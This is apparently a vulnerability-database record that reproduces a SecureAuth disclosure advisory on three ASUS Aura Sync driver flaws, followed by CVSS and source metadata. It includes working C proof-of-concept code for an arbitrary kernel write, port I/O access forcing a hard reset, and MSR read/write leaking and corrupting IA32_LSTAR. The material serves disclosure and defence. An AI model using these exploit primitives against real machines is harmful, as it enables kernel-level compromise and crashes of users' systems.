VAR-201812-0059
Vulnerability from variot - Updated: 2024-11-23 22:00The Asusgio low-level driver in ASUS Aura Sync v1.07.22 and earlier exposes functionality to read and write Machine Specific Registers (MSRs). This could be leveraged to execute arbitrary ring-0 code. ASUS Aura Sync Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Asus Aura Sync is prone to multiple arbitrary code-execution vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code in the context of the affected application and gain elevated privileges. Failed exploits will result in denial-of-service conditions. ASUS Aura Sync 1.07.22 is vulnerable; other versions may also be affected. SecureAuth - SecureAuth Labs Advisory http://www.secureauth.com/
ASUS Drivers Elevation of Privilege Vulnerabilities
1. Advisory Information**
Title: ASUS Drivers Elevation of Privilege Vulnerabilities Advisory ID: CORE-2017-0012 Advisory URL: http://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities Date published: 2018-12-18 Date of last update: 2018-12-18 Vendors contacted: Asus Release mode: User release
2. Vulnerability Information**
Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2018-18537, CVE-2018-18536, CVE-2018-18535
3. Vulnerability Description**
ASUS offers several drivers and utilities [1] in order to give the user more control over certain settings and functions of the motherboard. In particular, ASUS Aura Sync takes RGB lighting beyond the checkbox, combining and controlling the LEDs of all your Aura-enabled products from a single application to achieve perfect, synchronized harmony. From motherboards and RGB strips to graphics cards and beyond, Aura Sync enables a veritable symphony of light for ultimate personalization.
4. Vulnerable Packages**
.
5. Vendor Information, Solutions and Workarounds**
The vendor did not provide fixes or workaround information.
6. Credits**
These vulnerabilities were discovered and researched by Diego Juarez. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team.
7. Technical Description / Proof of Concept Code**
Aura Sync is ASUS's command software for all their line of recent RGB lighting enabled devices (motherboards/graphics cards/keyboards/mice/etc).
The main subject of this advisory are two of the device drivers installed/loaded by the Aura Sync application. From now on addressed as "Asusgio" and "GLCKIo". Default installation allows non-privileged user processes (even running at LOW INTEGRITY) to get a HANDLE and issue IOCTL codes to these drivers.
The following sections describe the problems found.
7.1. Arbitrary ring0 write**
[CVE-2018-18537] There is a path in the processing of IOCTL_GLCKIO_READPORT (0x80102050) on GLCKIo leading to write of arbitrary DWORD to an arbitrary address.
/-----
.text:FFFFF800B09F13FE loc_FFFFF800B09F13FE:
.text:FFFFF800B09F13FE mov rax, [rsp+0C8h+var_38]
; CONTROLLED VALUE
.text:FFFFF800B09F1406 mov ecx, [rsp+0C8h+var_56]
; CONTROLLED VALUE
.text:FFFFF800B09F140A mov [rax], ecx
; Arbitrary DWORD sized write!
.text:FFFFF800B09F140C mov rax, [rsp+0C8h+Irp]
.text:FFFFF800B09F1414 mov qword ptr [rax+38h], 4
.text:FFFFF800B09F141C jmp short loc_FFFFF800B09F142D
-----/
Proof of Concept: /-----
include
HANDLE ghDriver = 0;
define IOCTL_GLCKIO_VMWRITE 0x80102050
typedef struct _STRUCT_GLCKIO_VMWRITE { WORD unk0; DWORD unk1_1; WORD unk1_2; ULONG64 unk2; ULONG64 unk3; ULONG64 unk4; ULONG64 unk5; ULONG64 unk6; } STRUCT_GLCKIO_VMWRITE;
BOOL ArbitraryWriteDWORD(ULONG64 dest, DWORD value) { STRUCT_GLCKIO_VMWRITE mystructIn = { 0 }; mystructIn.unk0 = 0xf11; mystructIn.unk1_1 = value; // value mystructIn.unk5 = dest; // address
STRUCT_GLCKIO_VMWRITE mystructOut = { 0 };
DWORD returned = 0;
DeviceIoControl(ghDriver, IOCTL_GLCKIO_VMWRITE, (LPVOID)&mystructIn,
sizeof(mystructIn), (LPVOID)&mystructOut, sizeof(mystructOut), &returned, NULL); return BOOL(returned); }
BOOL InitDriver() { ghDriver = CreateFile("\\.\GLCKIo", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to GLCKIo driver - GetLastError:%d\n", GetLastError()); return FALSE; } return TRUE; }
int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (arbitrary ring0 write)\n");
if (!InitDriver()) {
exit(0);
}
printf("press ENTER for instant BSOD\n");
getchar();
ArbitraryWriteDWORD(0, 0xffffffff);
CloseHandle(ghDriver);
return 0;
} -----/
7.2. Port mapped I/O access**
[CVE-2018-18536] Both GLCKIo and Asusgio expose a functionality to read/write data from/to IO ports. This could be leveraged in a number of ways to ultimately run code with elevated privileges.
/----- // This harmless PoC only reboots the PC, much more sinister stuff // would also be possible by abusing this functionality.
// Compile for 32bit!!! Asusgio apparently has a bug preventing this // functionality to work unless IoIs32bitProcess == TRUE. They set rdx // as a pointer instead of a port number on the in/out instruction... // and they ONLY do this incorrectly in the x64 process specific code.(!?)
include "stdafx.h"
include
// for \.\glckio
define IOCTL_GLCKIO_WRITEPORT 0x80102054
define IOCTL_GLCKIO_READPORT 0x80102050
// for \.\Asusgio
define IOCTL_ASIO_PORTREADB 0xA0406400
define IOCTL_ASIO_PORTWRITEB 0xA040A440
HANDLE ghDriver = 0;
typedef BYTE(fnPMIOReadB)(WORD port); typedef BYTE(fnPMIOWriteB)(WORD port, BYTE value);
pragma pack (push,1)
typedef struct { DWORD DriverIndex; // DriverEnum index BYTE DeviceName[MAX_PATH]; fnPMIOReadB pPMIOReadB; fnPMIOWriteB pPMIOWriteB; } AutoConfigStruct;
AutoConfigStruct gConfig = { 0 };
enum DriverEnum { ASIO = 1, GLCKIO, };
typedef struct _ASIO_PORTIO_STRUCT { DWORD port; ULONG64 value; } ASIO_PORTIO_STRUCT;
typedef struct _GLCKIO_PORTIO_STRUCT { WORD port; DWORD value; DWORD datalen; } GLCKIO_PORTIO_STRUCT;
pragma pack(pop)
#define IOCTLMACRO(iocontrolcode, size) \ BYTE outbuffer[0x30] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[0]; \
BYTE GLCKIO_PMIOReadB(WORD port) { GLCKIO_PORTIO_STRUCT inbuffer = { port, 0, 1}; IOCTLMACRO(IOCTL_GLCKIO_READPORT, 10) }
BYTE GLCKIO_PMIOWriteB(WORD port, BYTE value) { GLCKIO_PORTIO_STRUCT inbuffer = { port, value, 1 }; IOCTLMACRO(IOCTL_GLCKIO_WRITEPORT, 10) }
BYTE ASIO_PMIOReadB(WORD port) { ASIO_PORTIO_STRUCT inbuffer = { port, 0 }; IOCTLMACRO(IOCTL_ASIO_PORTREADB, 4) }
BYTE ASIO_PMIOWriteB(WORD port, BYTE value) { ASIO_PORTIO_STRUCT inbuffer = { port, value }; IOCTLMACRO(IOCTL_ASIO_PORTWRITEB, 5) }
void Reboot() { BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6; gConfig.pPMIOWriteB(0xcf9, cf9 | 2); Sleep(50); gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe); Sleep(50); }
BOOL InitDriver() { char *szDeviceNames[] = { "\\.\Asusgio" , "\\.\GLCKIo" }; BYTE i = 0; for (i = 0; i<2; i++) { ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (ghDriver == INVALID_HANDLE_VALUE) {
printf("Cannot get handle to driver object \'%s\'-
GetLastError:%d\n", szDeviceNames[i], GetLastError()); continue; }
gConfig.DriverIndex = i+1;
memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH-1);
break;
}
switch (gConfig.DriverIndex) {
case DriverEnum::ASIO:
{
gConfig.pPMIOReadB = (fnPMIOReadB)ASIO_PMIOReadB;
gConfig.pPMIOWriteB = (fnPMIOWriteB)ASIO_PMIOWriteB;
}
break;
case DriverEnum::GLCKIO:
{
gConfig.pPMIOReadB = (fnPMIOReadB)GLCKIO_PMIOReadB;
}
gConfig.pPMIOWriteB = (fnPMIOWriteB)GLCKIO_PMIOWriteB;
break;
default:
break;
}
return gConfig.DriverIndex ? TRUE : FALSE;
}
int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (PMIO access)\n");
if (!InitDriver()) {
printf("InitDriver failed! - aborting...\n");
exit(0);
}
printf("DeviceName: \'%s\' Handle: %08x\n", gConfig.DeviceName,
(DWORD)ghDriver); printf("press ENTER for hard reset..."); getchar(); Reboot(); CloseHandle(ghDriver); } -----/
*7.3.
Proof of Concept:
/----- // This PoC demonstrates insecure access to MSRs by reading IA32_LSTAR // register value (leaks a kernel function pointer bypassing KASLR) and // then writing garbage to it (instant BSOD!)
include
// for \.\Asusgio
define IOCTL_ASIO_RDMSR 0xA0406458
define IOCTL_ASIO_WRMSR 0xA040A45C
HANDLE ghDriver = 0;
pragma pack (push,1)
typedef struct _ASIO_MSRIO_STRUCT { DWORD reg; ULONG64 value; } ASIO_MSRIO_STRUCT;
pragma pack(pop)
#define IOCTLMACRO(iocontrolcode, size) \ ULONG64 outbuffer[2] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[0]; \
ULONG64 ASIO_RDMSR(DWORD reg) { ASIO_MSRIO_STRUCT inbuffer = { reg }; IOCTLMACRO(IOCTL_ASIO_RDMSR, 4) }
ULONG64 ASIO_WRMSR(DWORD reg, ULONG64 value) { ASIO_MSRIO_STRUCT inbuffer = { reg, value }; IOCTLMACRO(IOCTL_ASIO_WRMSR, 12) }
BOOL InitDriver() { ghDriver = CreateFile("\\.\Asusgio", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (ghDriver == INVALID_HANDLE_VALUE) {
printf("Cannot get handle to driver object \'%s\'-
GetLastError:%d\n", "\\.\Asusgio", GetLastError()); return FALSE; }
return TRUE;
}
int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (MSR access)\n");
if (!InitDriver()) {
printf("InitDriver failed! - aborting...\n");
exit(0);
}
ULONG64 IA32_LSTAR = ASIO_RDMSR(0xC0000082);
printf("IA32_LSTAR: %llx (should be nt!KiSystemCall64)\n", IA32_LSTAR);
printf("press ENTER for instant BSOD\n");
getchar();
a = ASIO_WRMSR(0xC0000082, 0xffff1111ffff2222);
CloseHandle(ghDriver);
} -----/
8. Report Timeline** 2017-11-27: SecureAuth sent an initial notification to ASUS, asking for GPG keys. 2017-12-14: SecureAuth sent a second notification to ASUS. 2018-01-29: SecureAuth sent a third notification to ASUS. 2018-01-30: Asus acknowledged SecureAuth's e-mail and asked for a report with technical information. 2018-01-31: SecureAuth sent Asus a draft version of the advisory. 2018-02-07: SecureAuth requested an update from Asus regarding the reported vulnerabilities and a tentative schedule. 2018-02-14: SecureAuth again requested an update from Asus regarding the reported vulnerabilities and a tentative schedule. 2018-02-21: Asus acknowledged SecureAuth's draft report and asked for time for internal investigations. 2018-02-21: Asus answered saying that they were planning to update Aura in April. 2018-02-21: SecureAuth thanked Asus's feedback and requested a regular contact until the Auras update. 2018-03-19: SecureAuth asked for a status update. 2018-03-26: SecureAuth asked for a status update again. 2018-03-26: SecureAuth asked Asus to confirm if this new version had been already released. 2018-04-03: SecureAuth requested a status update. 2018-04-16: SecureAuth requested a confirmation for Asus. 2018-04-23: SecureAuth requested a confirmation for Asus again. However, this version didn't address the reported vulnerabilities. For that reason, SecureAuth requested a clarification about the case. In this context, SecureAuth requested a new clarification. 2018-07-03: SecureAuth requested a status update. 2018-12-18: Advisory CORE-2017-0012 published as 'user release'.
9. References**
[1] https://www.asus.com/support
10. About SecureAuth Labs**
SecureAuth Labs, the research arm of SecureAuth Corporation, is charged with anticipating the future needs and requirements for information security technologies. We conduct research in several important areas of computer security, including identity-related attacks, system vulnerabilities and cyber-attack planning. Research includes problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. We regularly publish security advisories, primary research, technical publications, research blogs, project information, and shared software tools for public use at http://www.secureauth.com.
11. About SecureAuth**
SecureAuth is leveraged by leading companies, their employees, their customers and their partners to eliminate identity-related breaches. As a leader in access management, identity governance, and penetration testing, SecureAuth is powering an identity security revolution by enabling people and devices to intelligently and adaptively access systems and data, while effectively keeping bad actors from doing harm. By ensuring the continuous assessment of risk and enablement of trust, SecureAuth's highly flexible Identity Security Automation (ISA) platform makes it easier for organizations to prevent the misuse of credentials and exponentially reduce the enterprise threat surface. To learn more, visit www.secureauth.com, call (949) 777-6959, or email us at info@secureauth.com
12. Disclaimer**
The contents of this advisory are copyright (c) 2018 SecureAuth, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201812-0059",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "aura sync",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "1.07.22"
},
{
"model": "aura sync framework",
"scope": "lte",
"trust": 0.8,
"vendor": "asustek computer",
"version": "1.07.22"
},
{
"model": "aura sync",
"scope": "eq",
"trust": 0.3,
"vendor": "asus",
"version": "1.7.22"
}
],
"sources": [
{
"db": "BID",
"id": "106250"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014518"
},
{
"db": "NVD",
"id": "CVE-2018-18535"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:asus:aura_sync_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-014518"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Diego Juarez",
"sources": [
{
"db": "BID",
"id": "106250"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-977"
}
],
"trust": 0.9
},
"cve": "CVE-2018-18535",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CVE-2018-18535",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "VHN-129104",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2018-18535",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-18535",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-18535",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201812-977",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-129104",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-129104"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-014518"
},
{
"db": "CNNVD",
"id": "CNNVD-201812-977"
},
{
"db": "NVD",
"id": "CVE-2018-18535"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Asusgio low-level driver in ASUS Aura Sync v1.07.22 and earlier exposes functionality to read and write Machine Specific Registers (MSRs). This could be leveraged to execute arbitrary ring-0 code. ASUS Aura Sync Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Asus Aura Sync is prone to multiple arbitrary code-execution vulnerabilities. \nSuccessfully exploiting these issues may allow an attacker to execute arbitrary code in the context of the affected application and gain elevated privileges. Failed exploits will result in denial-of-service conditions. \nASUS Aura Sync 1.07.22 is vulnerable; other versions may also be affected. SecureAuth - SecureAuth Labs Advisory\nhttp://www.secureauth.com/\n\nASUS Drivers Elevation of Privilege Vulnerabilities\n\n*1. *Advisory Information**\n\nTitle: ASUS Drivers Elevation of Privilege Vulnerabilities\nAdvisory ID: CORE-2017-0012\nAdvisory URL:\nhttp://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities\nDate published: 2018-12-18\nDate of last update: 2018-12-18\nVendors contacted: Asus\nRelease mode: User release\n\n*2. *Vulnerability Information**\n\nClass: Exposed IOCTL with Insufficient Access Control [CWE-782],\nExposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL\nwith Insufficient Access Control [CWE-782]\nImpact: Code execution\nRemotely Exploitable: No\nLocally Exploitable: Yes\nCVE Name: CVE-2018-18537, CVE-2018-18536, CVE-2018-18535\n\n*3. *Vulnerability Description**\n\nASUS offers several drivers and utilities [1] in order to give the user\nmore control over certain settings and functions of the motherboard. \nIn particular, ASUS Aura Sync takes RGB lighting beyond the checkbox,\ncombining and controlling the LEDs of all your Aura-enabled products\nfrom a single application to achieve perfect, synchronized harmony. From\nmotherboards and RGB strips to graphics cards and beyond, Aura Sync\nenables a veritable symphony of light for ultimate personalization. \n\n*4. *Vulnerable Packages**\n\n. \n\n*5. *Vendor Information, Solutions and Workarounds**\n\nThe vendor did not provide fixes or workaround information. \n\n*6. *Credits**\n\nThese vulnerabilities were discovered and researched by Diego Juarez. \nThe publication of this advisory was coordinated by Leandro Cuozzo from\nSecureAuth Advisories Team. \n\n*7. *Technical Description / Proof of Concept Code**\n\nAura Sync is ASUS\u0027s command software for all their line of recent RGB\nlighting enabled devices (motherboards/graphics cards/keyboards/mice/etc). \n\nThe main subject of this advisory are two of the device drivers\ninstalled/loaded by the Aura Sync application. From now on addressed as\n\"Asusgio\" and \"GLCKIo\". Default installation allows non-privileged user\nprocesses (even running at LOW INTEGRITY) to get a HANDLE and issue\nIOCTL codes to these drivers. \n\nThe following sections describe the problems found. \n\n*7.1. *Arbitrary ring0 write**\n\n[CVE-2018-18537]\nThere is a path in the processing of IOCTL_GLCKIO_READPORT (0x80102050)\non GLCKIo leading to write of arbitrary DWORD to an arbitrary address. \n\n/-----\n.text:FFFFF800B09F13FE loc_FFFFF800B09F13FE:\n.text:FFFFF800B09F13FE mov rax, [rsp+0C8h+var_38] \n; CONTROLLED VALUE\n.text:FFFFF800B09F1406 mov ecx, [rsp+0C8h+var_56] \n; CONTROLLED VALUE\n.text:FFFFF800B09F140A mov [rax], ecx \n; Arbitrary DWORD sized write!\n.text:FFFFF800B09F140C mov rax, [rsp+0C8h+Irp]\n.text:FFFFF800B09F1414 mov qword ptr [rax+38h], 4\n.text:FFFFF800B09F141C jmp short loc_FFFFF800B09F142D\n-----/\n\nProof of Concept:\n/-----\n#include \u003cwindows.h\u003e\nHANDLE ghDriver = 0;\n\n#define IOCTL_GLCKIO_VMWRITE 0x80102050\n\ntypedef struct _STRUCT_GLCKIO_VMWRITE {\n WORD unk0;\n DWORD unk1_1;\n WORD unk1_2;\n ULONG64 unk2;\n ULONG64 unk3;\n ULONG64 unk4;\n ULONG64 unk5;\n ULONG64 unk6;\n} STRUCT_GLCKIO_VMWRITE;\n\nBOOL ArbitraryWriteDWORD(ULONG64 dest, DWORD value)\n{\n STRUCT_GLCKIO_VMWRITE mystructIn = { 0 };\n mystructIn.unk0 = 0xf11;\n mystructIn.unk1_1 = value; // value\n mystructIn.unk5 = dest; // address\n\n STRUCT_GLCKIO_VMWRITE mystructOut = { 0 };\n\n DWORD returned = 0;\n\n DeviceIoControl(ghDriver, IOCTL_GLCKIO_VMWRITE, (LPVOID)\u0026mystructIn,\nsizeof(mystructIn), (LPVOID)\u0026mystructOut, sizeof(mystructOut),\n\u0026returned, NULL);\n return BOOL(returned);\n}\n\nBOOL InitDriver()\n{\n ghDriver = CreateFile(\"\\\\\\\\.\\\\GLCKIo\", GENERIC_READ | GENERIC_WRITE,\nFILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,\nFILE_ATTRIBUTE_NORMAL, NULL);\n if (ghDriver == INVALID_HANDLE_VALUE) {\n printf(\"Cannot get handle to GLCKIo driver - GetLastError:%d\\n\",\nGetLastError());\n return FALSE;\n }\n return TRUE;\n}\n\nint _tmain(int argc, _TCHAR* argv[])\n{\n printf(\"ASUS Aura Sync PoC (arbitrary ring0 write)\\n\");\n\n if (!InitDriver()) {\n exit(0);\n }\n\n printf(\"press ENTER for instant BSOD\\n\");\n getchar();\n ArbitraryWriteDWORD(0, 0xffffffff);\n\n CloseHandle(ghDriver);\n return 0;\n}\n-----/\n\n*7.2. *Port mapped I/O access**\n\n[CVE-2018-18536]\nBoth GLCKIo and Asusgio expose a functionality to read/write data\nfrom/to IO ports. This could be leveraged in a number of ways to\nultimately run code with elevated privileges. \n\n/-----\n// This harmless PoC only reboots the PC, much more sinister stuff\n// would also be possible by abusing this functionality. \n\n// Compile for 32bit!!! Asusgio apparently has a bug preventing this\n// functionality to work unless IoIs32bitProcess == TRUE. They set rdx\n// as a pointer instead of a port number on the in/out instruction... \n// and they ONLY do this incorrectly in the x64 process specific code.(!?)\n\n#include \"stdafx.h\"\n#include \u003cwindows.h\u003e\n\n// for \\\\.\\glckio\n#define IOCTL_GLCKIO_WRITEPORT 0x80102054\n#define IOCTL_GLCKIO_READPORT 0x80102050\n\n// for \\\\.\\Asusgio\n#define IOCTL_ASIO_PORTREADB 0xA0406400\n#define IOCTL_ASIO_PORTWRITEB 0xA040A440\n\nHANDLE ghDriver = 0;\n\ntypedef BYTE(*fnPMIOReadB)(WORD port);\ntypedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value);\n\n#pragma pack (push,1)\n\ntypedef struct {\n DWORD DriverIndex; // DriverEnum index\n BYTE DeviceName[MAX_PATH];\n fnPMIOReadB pPMIOReadB;\n fnPMIOWriteB pPMIOWriteB;\n} AutoConfigStruct;\n\nAutoConfigStruct gConfig = { 0 };\n\nenum DriverEnum {\n ASIO = 1,\n GLCKIO,\n};\n\ntypedef struct _ASIO_PORTIO_STRUCT {\n DWORD port;\n ULONG64 value;\n} ASIO_PORTIO_STRUCT;\n\ntypedef struct _GLCKIO_PORTIO_STRUCT {\n WORD port;\n DWORD value;\n DWORD datalen;\n} GLCKIO_PORTIO_STRUCT;\n\n#pragma pack(pop)\n\n#define IOCTLMACRO(iocontrolcode, size) \\\n BYTE outbuffer[0x30] = { 0 }; \\\n DWORD returned = 0; \\\n DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)\u0026inbuffer,\n##size##, (LPVOID)outbuffer, sizeof(outbuffer), \u0026returned, NULL); \\\n return outbuffer[0]; \\\n\nBYTE GLCKIO_PMIOReadB(WORD port)\n{\n GLCKIO_PORTIO_STRUCT inbuffer = { port, 0, 1};\n IOCTLMACRO(IOCTL_GLCKIO_READPORT, 10)\n}\n\nBYTE GLCKIO_PMIOWriteB(WORD port, BYTE value)\n{\n GLCKIO_PORTIO_STRUCT inbuffer = { port, value, 1 };\n IOCTLMACRO(IOCTL_GLCKIO_WRITEPORT, 10)\n}\n\nBYTE ASIO_PMIOReadB(WORD port)\n{\n ASIO_PORTIO_STRUCT inbuffer = { port, 0 };\n IOCTLMACRO(IOCTL_ASIO_PORTREADB, 4)\n}\n\nBYTE ASIO_PMIOWriteB(WORD port, BYTE value)\n{\n ASIO_PORTIO_STRUCT inbuffer = { port, value };\n IOCTLMACRO(IOCTL_ASIO_PORTWRITEB, 5)\n}\n\nvoid Reboot()\n{\n BYTE cf9 = gConfig.pPMIOReadB(0xcf9) \u0026 ~0x6;\n gConfig.pPMIOWriteB(0xcf9, cf9 | 2);\n Sleep(50);\n gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe);\n Sleep(50);\n}\n\nBOOL InitDriver()\n{\n char *szDeviceNames[] = { \"\\\\\\\\.\\\\Asusgio\" , \"\\\\\\\\.\\\\GLCKIo\" };\n BYTE i = 0;\n for (i = 0; i\u003c2; i++) {\n ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ |\nGENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,\nFILE_ATTRIBUTE_NORMAL, NULL);\n\n if (ghDriver == INVALID_HANDLE_VALUE) {\n printf(\"Cannot get handle to driver object \\\u0027%s\\\u0027-\nGetLastError:%d\\n\", szDeviceNames[i], GetLastError());\n continue;\n }\n\n gConfig.DriverIndex = i+1;\n memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH-1);\n break;\n }\n\n switch (gConfig.DriverIndex) {\n case DriverEnum::ASIO:\n {\n gConfig.pPMIOReadB = (fnPMIOReadB)ASIO_PMIOReadB;\n gConfig.pPMIOWriteB = (fnPMIOWriteB)ASIO_PMIOWriteB;\n }\n break;\n\n case DriverEnum::GLCKIO:\n {\n gConfig.pPMIOReadB = (fnPMIOReadB)GLCKIO_PMIOReadB;\n }\n gConfig.pPMIOWriteB = (fnPMIOWriteB)GLCKIO_PMIOWriteB;\n break;\n\n default:\n break;\n }\n\n return gConfig.DriverIndex ? TRUE : FALSE;\n}\n\nint _tmain(int argc, _TCHAR* argv[])\n{\n printf(\"ASUS Aura Sync PoC (PMIO access)\\n\");\n \n if (!InitDriver()) {\n printf(\"InitDriver failed! - aborting...\\n\");\n exit(0);\n }\n\n printf(\"DeviceName: \\\u0027%s\\\u0027 Handle: %08x\\n\", gConfig.DeviceName,\n(DWORD)ghDriver);\n printf(\"press ENTER for hard reset...\");\n getchar();\n Reboot();\n CloseHandle(ghDriver);\n}\n-----/\n\n*7.3. \n \nProof of Concept:\n\n/-----\n// 